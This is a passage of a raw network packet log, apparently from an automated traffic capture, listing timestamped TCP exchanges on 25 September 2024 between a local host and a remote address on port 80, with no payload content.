Sep 25, 2024 18:33:53.595563889 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.595587969 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.595603943 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.595622063 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.595632076 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.595654011 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.595936060 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.595951080 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.595968008 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.595983982 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.595994949 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.595999956 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.596014977 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.596016884 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.596030951 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.596076965 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.596282959 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.596298933 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.596323013 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.596326113 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.596338034 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.596353054 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.596366882 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.596383095 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.596388102 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.596398115 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.596410990 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.596410990 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.596414089 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.596431971 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.596446991 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.596460104 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.596460104 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.596463919 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.596919060 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.597089052 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.597104073 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.597119093 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.597136021 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.597141981 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.597151995 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.597167969 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.597188950 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.597204924 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.597204924 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.597604990 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.597619057 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.597634077 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.597650051 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.597660065 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.597665071 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.597681046 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.597696066 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.597702026 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.597702026 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.597713947 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.597728968 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.597743034 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.597759008 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.597765923 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.597765923 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.597774982 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.597796917 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.597812891 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.597872972 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.598520041 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.598536015 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.598550081 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.598567009 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.598582029 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.598597050 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.598608971 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.598608971 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.598612070 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.598632097 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.598645926 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.598660946 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.598676920 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.598681927 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.598681927 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.598692894 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.598707914 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.598725080 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.598726034 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.598726034 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.598949909 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.599486113 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.599502087 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.599517107 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.599531889 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.599545956 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.599560976 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.599575043 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.599576950 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.599576950 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.599592924 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.599606991 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.599622965 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.599623919 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.599623919 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.599637032 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.599652052 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.599667072 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.599682093 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.599695921 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.599695921 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.599817038 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.600313902 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.600331068 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.600349903 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.600366116 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.600375891 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.600380898 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.600397110 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.600419998 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.600434065 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.600435019 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.600434065 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.600452900 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.600552082 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.621941090 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.666527987 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.666603088 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.666639090 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.666675091 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.666709900 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.666729927 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.666759968 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.666774035 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.666795969 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.666831017 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.666868925 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.666872025 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.666872025 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.666901112 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.666934013 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.666965961 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.666980028 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.667025089 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.667105913 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.667126894 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.667161942 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.667201996 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.685179949 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.685240984 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.685276985 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.685333014 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.685340881 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.685340881 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.685367107 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.685400963 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.685437918 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.685514927 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.685858965 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.685892105 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.685931921 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.685931921 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.685949087 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.685981989 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.686016083 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.686052084 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.686075926 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.686084986 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.686117887 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.686151028 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.686158895 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.686158895 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.686183929 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.686217070 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.686250925 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.686292887 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.686292887 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.686419010 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.686451912 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.686485052 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.686522961 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.686557055 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.686589956 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.686598063 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.686598063 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.686654091 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.686822891 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.686856031 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.686888933 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.686927080 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.686945915 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.686960936 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.686997890 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.687066078 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.687253952 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.687304974 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.687338114 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.687371016 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.687376022 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.687376022 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.687422037 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.687450886 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.687484980 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.687516928 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.687550068 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.687582970 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.687587023 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.687587023 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.687614918 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.687648058 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.687657118 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.687680960 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.687716007 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.687803030 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.688146114 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.688198090 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.688200951 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.688230991 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.688263893 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.688298941 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.688330889 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.688364029 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.688365936 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.688365936 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.688396931 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.688430071 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.688462973 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.688463926 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.688463926 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.688496113 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.688529015 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.688560009 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.688594103 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.688596010 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.688596010 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.688937902 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.688972950 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.689006090 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.689054012 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.689055920 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.689089060 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.689121008 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.689121962 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.689121962 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.689153910 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.689186096 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.689218998 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.689250946 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.689253092 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.689253092 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.689285994 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.689326048 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.689555883 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.689590931 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.689632893 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.689670086 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.689702988 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.689708948 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.689708948 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.689735889 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.689769030 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.689800024 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.689815998 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.689836025 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.689847946 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.689868927 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.689902067 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.689934969 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.689968109 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.689973116 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.689973116 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.690001011 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.690035105 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.690068007 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.690100908 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.690123081 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.690123081 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.690134048 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.690321922 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.690439939 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.690473080 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.690505981 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.690560102 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.690594912 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.690628052 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.690639019 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.690639019 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.690660954 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.690695047 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.690732002 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.690771103 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.690771103 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.756879091 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.756922960 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.756939888 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.756982088 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.757044077 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.757060051 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.757076025 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.757122993 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.757123947 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.757179022 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.757191896 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.757385015 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.775702000 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.775718927 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.775737047 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.775810957 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.775989056 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.776006937 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.776045084 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.776055098 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.776071072 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.776115894 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.776217937 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.776232004 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.776248932 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.776263952 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.776274920 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.776279926 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.776302099 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.776328087 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.776518106 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.776668072 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.776683092 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.776699066 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.776705027 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.776715040 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.776730061 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.776743889 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.776758909 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.776770115 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.776777029 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.776803970 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.777170897 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.777184963 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.777199984 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.777221918 CEST	80	49699	172.94.3.25	192.168.2.7
